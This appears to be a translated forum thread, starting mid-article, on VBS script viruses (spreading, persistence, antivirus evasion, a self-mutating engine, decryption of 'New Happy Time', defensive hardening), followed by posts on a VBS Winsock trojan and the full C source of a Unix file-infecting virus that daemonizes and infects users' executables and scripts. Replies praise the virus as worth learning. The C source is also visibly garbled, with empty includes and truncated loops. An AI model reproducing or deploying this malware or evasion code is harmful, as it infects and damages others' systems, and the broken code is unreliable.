The above code is used to write a line of code into the Script.ini file. Actually, many other codes will be written. The commands in Script.ini are used to control the IRC session, and the commands in this file can be executed automatically. For example, the "Song Worm" virus TUNE.VBS will modify c:\mirc\script.ini and c:\mirc\mirc.ini so that whenever an IRC user uses the infected channel, they will receive a TUNE.VBS sent via DDC. Similarly, if Pirch98 is installed in the c:\pirch98 directory of the target computer, the virus will modify c:\pirch98\events.ini and c:\pirch98\pirch98.ini so that whenever an IRC user uses the infected channel, they will receive a TUNE.VBS sent via DDC.
In addition, the virus can also spread through KaZaA which is widely popular now. The virus copies the virus file to the default shared directory of KaZaA. In this way, when other users visit this machine, they may download and execute this virus file. This spread method may play a role with the popularity of KaZaA such peer-to-peer sharing tools.
There are some other spread methods, which we will not list one by one here.


3. How VBS script viruses obtain control
How to obtain control? This is an interesting topic, and VBS script viruses seem to have played this topic to the fullest. The author lists several typical methods here:
1) Modify the registry key
When Windows starts, it will automatically load the programs pointed to by each key value in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The script virus can add a key value here to point to the virus program, so that it can get control every time the machine starts. The method for vbs to modify the registry is relatively simple, and you can directly call the following statement.
wsh.RegWrite(strName, anyvalue )
2) Through the mapping file execution method
For example, our new Happy Time modifies the execution method of dll to wscript.exe. Even the mapping of the exe file can be pointed to the virus code.
3) Deceive the user to let the user execute it themselves
This method is actually related to the user's psychology. For example, when the virus sends an attachment, it uses a double-suffix file name. Since the suffix is not displayed by default, for example, a vbs program with the file name beauty.jpg.vbs is displayed as beauty.jpg. At this time, the user will often click it as a picture. Similarly, for the user's own disk files, when the virus infects them, it generates a virus file with the original file name as the prefix and.vbs as the suffix, and deletes the original file. In this way, the user may run this vbs file as their original file.
4) Desktop.ini and folder.htt cooperate with each other
These two files can be used to configure the active desktop and can also be used to customize the folder. If the user's directory contains these two files, when the user enters this directory, the virus code in folder.htt will be triggered. This is an effective method for the new Happy Time virus to obtain control. And using folder.htt, it may also trigger the exe file, which may also become an effective method for the virus to get control!
There are many ways for the virus to obtain control, and the author has a relatively large room for play in this regard.

4. Several techniques for VBS script viruses to resist anti-virus software
For the virus to survive, the ability to resist anti-virus software is also necessary. Generally speaking, VBS script viruses use the following several methods to resist anti-virus software:
1) Self-encryption
For example, the new Happy Time virus can randomly select a key to encrypt and transform part of its own code, so that the virus code infected each time is different, achieving a polymorphic effect. This brings some difficulties to the traditional feature value virus detection method. The virus can further use the deformation technology, so that the decrypted code of the encrypted virus after each infection is different.
Now look at a simple vbs script deformation engine (from flyshadow)
Randomize
Set Of = CreateObject("Scripting.FileSystemObject") ’Create a file system object
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall ’Read its own code
fS = Array("Of", "vC", "fS", "fSC") ’Define an array of strings that will be replaced
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))) ’Replace the strings in array fS with 4 random characters
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC ’Write the replaced code back to the file
This code makes the four strings Of, vC, fS, and fSC in this VBS file replaced with random strings every time it runs, which can prevent anti-virus software from detecting it by the feature value virus detection method to a large extent.
2) Skillfully use the Execute function
Friends who have used VBS programs may find it strange: when a normal program uses the FileSystemObject object, some anti-virus software will report that the risk of this Vbs file is high when scanning this program, but why do some VBS script viruses also use the FileSystemObject object but there is no warning? The reason is very simple, that is, these viruses skillfully use the Execute method. Some anti-virus software will check whether the program declares to use the FileSystemObject object when detecting VBS viruses. If it is used, it will issue an alarm. If the virus converts this declaration code into a string and then executes it through the Execute(String) function, it can avoid some anti-virus software.
3) Change the declaration method of some objects
For example, fso = createobject("scripting.filesystemobject"), we change it to
fso = createobject("script" + "ing.filesyste" + "mobject"), so that the anti-virus software will not find the filesystemobject object when it performs static scanning.
4) Directly close the anti-virus software
VBS script has powerful functions. It can directly search for the user's process and then compare the process name. If it is found to be the process of the anti-virus software, it will directly close it and delete some of its key programs.

5. Introduction to the principle of the VBS virus generator
The so-called virus generator refers to software that can directly generate virus source code according to users' choices. To many people, this may be incredible. In fact, for script viruses, its implementation is very simple.
The script language is interpreted and executed, no compilation is required, there is no need for verification and positioning in the program, and each statement is separated relatively clearly. In this way, first make the virus functions into many separate modules. After the user makes the virus function selection, the generator only needs to piece together the corresponding function modules, and finally make corresponding code replacements and optimizations. Due to space limitations and other reasons, it will not be introduced in detail here.

III. How to prevent VBS script viruses
1. How to extract (encrypt) script viruses from samples
For unencrypted script viruses, we can directly find them from the virus samples. Now we will introduce how to extract encrypted VBS script viruses from virus samples. Here we take the new Happy Time as an example.
Open folder.htt with JediEdit. We find that this file has only 93 lines in total. The first line is <BODY onload="vbscript:KJ_start()">. After a few lines of comments, it starts with <html> and ends with </html>. I believe everyone knows what type of file this is!
Lines 87 to 91 are the following statements:
87: <script language=vbscript>
88: ExeString = "Afi FkSeboa)EqiiQbtq)S^pQbtq)AadobaPfdj)>mlibL^gb`p)CPK...; the rest is omitted, very long!
89: Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 3"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 4"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next") 90: Execute(ThisText) 91: </script>
Lines 87 and 91 need no explanation. Line 88 is an assignment of a string, which is obviously encrypted virus code. Looking at the last part of line 89 code ThisText = ThisText & TempChar, plus the next line, we can definitely guess that ThisText contains the virus decryption code (of course, brothers who are familiar with vbs can also analyze this decryption code, too simple! Even if you don't look at the code at all, you should be able to see it). Line 90 is to execute the code in ThisText just now (the code after decryption processing).
So, what should be done next? Very simple, we just need to output the content of ThisText to a text file after the virus code is decrypted. Since the above lines are vbscript, I created the following a.txt file:
First, copy lines 88 and 89 to the just-established.txt file. Of course, if you are willing to see the execution effect of the new Happy Time, you can also enter line 90 at the end. Then enter the vbs code for creating a file and writing ThisText to the file in the next line. The entire file is as follows:
ExeString = "Afi... ’ Line 88 code Execute("Dim KeyAr... ’ Line 89 code
set fso = createobject("scripting.filesystemobject") ’ Create a file system object
set virusfile = fso.createtextfile("resource.log",true) ’ Create a new file resource.log to store the decrypted virus code virusfile.writeline(ThisText) ’ Write the decrypted code to resource.log
OK! It's that simple. Save the file, change the file suffix name.txt to.vbs (.vbe is also okay), double-click, and you will find that there is an additional file resource.log in the directory of this file. Open this file, how about it? Is it the source code of "New Happy Time"?

2. Weaknesses of VBS script viruses
Since the programming language of VBS script viruses is a script, it will not be as convenient and flexible as PE files. Its operation needs conditions (but this condition is generally met by default). The author believes that VBS script viruses have the following weaknesses:
1) Most VBS script viruses need to use an object: FileSystemObject when running
2) VBScript code is interpreted and executed through Windows Script Host.
3) The operation of VBS script viruses needs the support of its associated program Wscript.exe.
4) Viruses spread through web pages need the support of ActiveX
5) Viruses spread through Email need the support of the automatic email sending function of OE, but most viruses use Email as the main spread method.

3. How to prevent and remove VBS script viruses
Aiming at the weaknesses of the VBS script viruses mentioned above, the author puts forward the following centralized prevention measures:
1) Disable the file system object FileSystemObject
Method: Use the command regsvr32 scrrun.dll /u to disable the file system object. Among them, regsvr32 is an executable file under Windows\System. Or directly find the scrrun.dll file and delete or rename it.
There is also a method to find a primary key {0D43FE01-F093-11CF-8940-00A0C9054228} under HKEY_CLASSES_ROOT\CLSID\ in the registry and delete it.
2) Uninstall Windows Scripting Host
In Windows 98 (the same is true for NT 4.0 and above), open → → → , and cancel the "Windows Scripting Host" item.
The same as the above method, find a primary key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} under HKEY_CLASSES_ROOT\CLSID\ in the registry and delete it.
3) Delete the mapping between VBS, VBE, JS, JSE file suffixes and applications
Click → → → , and then delete the mapping between VBS, VBE, JS, JSE file suffixes and applications.
4) In the Windows directory, find WScript.exe, change its name or delete it. If you think you may use it later, it is better to change its name. Of course, you can reinstall it later.
5) To thoroughly prevent VBS network worm viruses, you also need to set your browser. First, open the browser, click the button in the security tab in the menu bar. Set everything in "ActiveX controls and plugins" to disabled. In this way, you don't have to worry. Hehe, for example, if the ActiveX component of the new Happy Time cannot run, this network spread function will be over.
6) Disable the automatic send and receive email function of OE
7) Since worm viruses mostly make a fuss about file extensions, to prevent them, do not hide the extensions of known file types in the system. Windows defaults to "Hide extensions for known file types", and change it to display the extensions of all file types.
8) Set the security level of the system's network connection to at least "Medium". It can prevent to a certain extent the invasion of some harmful Java programs or some ActiveX components to the computer.
9) Hehe, the last item, everyone should know it without saying. Anti-virus software is indeed very necessary. Although some anti-virus software is quite disappointing to users, but the choice is mutual. In this network full of viruses, if your machine is not installed with anti-virus software, I think it is really incredible.

IV. Prospect for the development of all script-based viruses
With the rapid development of the network, network worm viruses have become popular, and VBS script worms are even more prominent. They not only have a large number but also great power. Since it is relatively easy to write viruses using scripts, in addition to continuing to popularize the current VBS script viruses, more other script-based viruses will gradually appear, such as PHP, JS, Perl viruses, etc.
But scripts are not the best tool for real virus technology enthusiasts to write viruses, and script viruses are relatively easy to remove and relatively easy to prevent. The author believes that script viruses will continue to be popular, but script worm viruses that can have a great impact like the I Love You and new Happy Time are only a minority

VBS has no public objects. VBS can also send data like general software. Can't not read it.

Lost Boy

Have you ever thought that VBS can also be used as a Trojan?
Is there such an object that VBS can also send data like a Trojan?
I'm not very clear about the TCP/IP protocol. The source code is only the following few lines.
Sorry!

' Source code:
' Display the local IP address
Dim IP
Set IP = CreateObject("MSWinsock.Winsock")
IPAddress = IP.LocalIP
Msgbox "Local IP = " & IPaddress
IP.close

Methods of the MSWINSOCK.WINSOCK object in VBS.
Sub Connect
Sub ConnectionRequest(ByVal requestID As Long)
Sub DataArrival(ByVal bytesTotal As Long)
Sub SendComplete
Sub SendProgress(ByVal bytesSent As Long, ByVal bytesRemaining As Long)
Property _RemoteHost As String
Sub AboutBox
Property LocalIP As String
Sub Accept(ByVal requestID As Long)
Sub Bind(, )
Property BytesReceived As Long
Sub Close
Sub Connect(, )
Sub GetData(data, , )
Sub Listen
Sub PeekData(data, , )
Property RemotePort As Long
Sub SendData(ByVal data)
Property SocketHandle As Long
Property State As Integer

### A UNIX Virus!!!!
### Written by NCKU EE htk
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define CHK 512
#define PERM S_IRWXU
#define CHKT 10
#define LOADER "\nrm -f /tmp/.@`whoami`;cat < "
#define LOADER2 " |tail -c 18606 >/tmp/.@`whoami`;chmod 700 /tmp/.@`whoami`;/tmp/.@`whoami`;rm -f /tmp/.@`whoami`;exit;\n"
/* ^^^^^modify here !!! */
#define VL 18606
/* and ^^^^^ here !!! */
#define VLL -VL

#define BUFSIZE 25088
#define BSI 80
#define EXE 1
#define SCR 2
struct flock bk;
int fo,f,status=NULL;
int flagn=0;
void main(argc,argv,envp)
int argc;
char *argv;
char *envp;
{
char *buf2,*fname;
static char pidp="/tmp/.";
static char bufr="";
static int dec;
unsigned int k,kep;
struct passwd *getp;
int caller(void);
int chec(int);
char *base(char *);
char *find(void);
void catch(void);
int check(char *,int);
signal(SIGCLD,SIG_IGN);

strcat(pidp,ecvt((double)getuid(),chec(getuid()),&dec,&dec));

fname=(char *)tempnam("/tmp",NULL);
buf2=(char *)malloc(BUFSIZE);
if((fo=open(argv,O_RDONLY))<0 || (f=creat(fname,PERM))<0) exit(1);
if((kep=lseek(fo,0L,2))>2*VL)
{
lseek(fo,VLL,2);
k=read(fo,buf2,VL);
write(f,buf2,k);
lseek(fo,VL,0);
while((k=read(fo,buf2,BUFSIZE))>0)
write(f,buf2,k);
/* ignore more lefting virus in a tail */
}
else
{
lseek(fo,VL-kep,2);
k=read(fo,buf2,kep-VL);
write(f,buf2,k);
}
close(f);
chmod(fname,S_IRWXU);
free(buf2);

if((kep=fork())>0)
{
for(k=0;k if(*(argv+k)=='@') exit(0);
execve(fname,argv,envp);
}
else
if(kep==0)
{
sleep(2);
unlink(fname);

for(k=0;k getp=(struct passwd *)getpwuid(getuid());
strcpy(argv,base(getp->pw_shell));

/* initialize daemon process ... */

for(k=0;k<2;k++) close(k);
umask(0);
if(fork()!=0)exit(0);
signal(SIGHUP,SIG_IGN);
signal(SIGINT,SIG_IGN);
signal(SIGTTOU,SIG_IGN);
setpgrp();
if((kep=open("/dev/tty",O_RDWR))>=0)
{ ioctl(kep,TIOCNOTTY,(char *)0);
close(kep);
}
if(fork()!=0)exit(0);

signal(SIGUSR1,catch);
if((kep=open(pidp,O_CREAT|O_RDWR,S_IRUSR|S_IWUSR))<0) exit(1);
k=read(kep,bufr,BSI);
if(k!=0) kill(atoi(bufr),SIGUSR1);

strcpy(bufr,ecvt((double)getpid(),chec(getpid()),&dec,&dec));
lseek(kep,0L,0);
do{
k=write(kep,bufr,strlen(pidp)+1);
while((buf2=find())!=NULL)
{
getp=(struct passwd *)getpwnam(buf2);
if(chdir((buf2=(char *)getp->pw_dir))<0) continue;
if(ftw(buf2,caller,15)!=0) continue;
}

sleep(CHKT);
setutent();
lseek(kep,0L,0);
}while(1);
}
}
int chec(num)
int num;
{
int y=1;
while((num=(int)(num/10))>=1) y++;
return(y);
}
void catch(void)
{
flagn=1;
}

char *base(poi)
char *poi;
{ int i;
for(i=(strlen(poi)-1);i>=0;i--)
if(*(poi+i)=='/') return((char *)(poi+i+1));
return("sh");
}
char *find()
{
static char name="";
struct utmp *goal;
goal=(struct utmp *)getutent();
if(goal->ut_type==USER_PROCESS)
{
strcpy(name,goal->ut_user);
return(name);
}
if(goal==(struct utmp *)NULL) return(NULL);
}

int caller(name,statptr,type)
char *name;
struct stat *statptr;
int type;
{ unsigned int nread,ymode;
static char load;
char buf,buf3;
if(type==FTW_F)
{
ymode=statptr->st_mode;
if(check(name,ymode)<0)
{ if(statptr->st_uid==getuid()) chmod(name,ymode);
return(0);
}
if( status==SCR )
{
strcpy(load,LOADER);
strcat(load,name);
strcat(load,LOADER2);
lseek(f,0L,2);
write(f,load,strlen(load));
lseek(fo,0L,0);
nread=read(fo,buf,VL);
write(f,buf,nread);
}
if( status==EXE )
{

if(statptr->st_size>VL)
{
lseek(f,0L,0);
nread=read(f,buf,VL);
lseek(f,0L,2);
write(f,buf,nread);
lseek(fo,0L,0);
nread=read(fo,buf,VL);
lseek(f,0L,0);
write(f,buf,nread);
}
else
{
lseek(f,0L,0);
nread=read(f,buf3,VL);
ymode=nread;
lseek(fo,0L,0);
nread=read(fo,buf,VL);
lseek(f,0L,0);
write(f,buf,nread);
write(f,buf3,ymode);
}
}
/* lseek(f,0L,0);
lockf(f,F_ULOCK,0); */
/* author's linux library has no above program library */

bk.l_type=F_UNLCK;
bk.l_whence=0;
bk.l_len=0;
bk.l_start=0;
fcntl(f,F_SETLK,&bk);

if(statptr->st_uid==getuid()) chmod(name,ymode);
close(f);
}
if(flagn) exit(0);
return(0);
}
int check(name,ymode)
char *name;
int ymode;
{
char ch;
char ch2;
int rd,i;
status=(int)NULL;
if((f=open(name,O_RDWR))<0)
{
if(chmod(name,ymode|S_IRUSR|S_IWUSR)<0) return(-1);
if((f=open(name,O_RDWR))<0) return(-1);
}
/* if(lockf(f,F_TLOCK,0)<0) { close(f); return(-1); } */

bk.l_type=F_WRLCK;
bk.l_whence=0;
bk.l_len=0;
bk.l_start=0;
if(fcntl(f,F_SETLK,&bk)<0) { close(f); return(-1); }

lseek(f,0L,0);
rd=read(f,ch,CHK);
lseek(fo,0L,0);
read(fo,ch2,rd);
for(i=0;i if(ch!=ch2)
{
if( ch!='#' && (ymode&(S_IXUSR|S_IXGRP|S_IXOTH)) )
{
status=EXE; return(1); }
else
if( ch=='#' && lseek(f,0L,2)>VL ) /* you can improve the rule */
{
lseek(f,VLL,2);
rd=read(f,ch,CHK);
lseek(fo,0L,0);
read(fo,ch2,rd);
for(i=0;i if(ch!=ch2)
{ status=SCR; return(1); }
}
else if(ch=='#')
{ status=SCR; return(1); }
break;
}
close(f);
return(-1);
}

Can learn programming methods and techniques

Well, GOOD, worthy of learning.

The things are not bad, but you have to be careful, and then the one who will cry will be yourself...